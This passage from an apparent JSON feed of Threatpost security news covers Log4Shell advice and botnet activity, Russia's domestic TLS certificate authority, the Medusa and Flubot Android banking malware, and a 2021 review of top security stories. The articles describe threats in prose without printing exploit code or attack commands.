post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by foreign countries. As it is, a pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizen\u2019s access to websites.\n\nAs it is, Russian sites are stuck, unable to renew their certs because sanctions keep signing authorities in many countries unable to accept payments from Russia, according to[ BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 more commonly known as SSL, or TLS/SSL \u2013 is a cryptographic protocol that secures the internet by encrypting data sent between your browser, the websites you visit and the website\u2019s server. The certificates keep data transmission private and prevent modification, loss or theft, as digicert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a[ notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers that were recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomebody with a Mozilla domain email on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new root Russia cert, pointing to the possibility of the Russian government using it to start mand-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). \u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. \u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 &amp; 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher 